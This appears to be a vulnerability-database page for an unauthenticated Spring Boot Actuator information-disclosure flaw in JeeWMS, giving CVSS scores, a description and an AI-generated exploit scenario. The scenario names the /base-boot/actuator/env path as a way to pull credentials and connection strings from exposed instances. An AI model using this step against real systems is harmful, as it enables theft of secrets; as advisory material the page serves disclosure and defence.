EUVD-2026-34988
GHSA-f5ww-rmh9-9wmc
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
A weakness has been identified in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This issue affects some unknown processing of the file /base-boot/actuator of the component Boot Actuator Endpoint. Executing a manipulation can lead to information disclosure. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.
AnalysisAI
Unauthenticated remote access to the Spring Boot Actuator endpoint in erzhongxmu JeeWMS exposes sensitive application internals to any network-reachable attacker. The /base-boot/actuator path, part of the Spring Boot management framework, is accessible without credentials, potentially leaking environment variables, configuration properties, internal service topology, and application health data. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | No special conditions required - CVSS AV:N/AC:L/PR:N/UI:N confirms remote unauthenticated exploitation against default configurations of JeeWMS. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 5.3 Medium score (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) reflects remote unauthenticated access with low confidentiality impact, but the raw score likely understates real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An unauthenticated attacker discovers an internet-exposed JeeWMS instance through passive reconnaissance (e.g., Shodan search for the /base-boot/actuator path or JeeWMS-specific response headers). The attacker sends a plain HTTP GET request to /base-boot/actuator/env and receives a JSON response containing Spring environment properties, which may include plaintext database connection strings, cloud storage credentials, or internal API keys. … |
| Remediation | No vendor-released patch has been identified at time of analysis - the vendor did not respond to coordinated disclosure. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today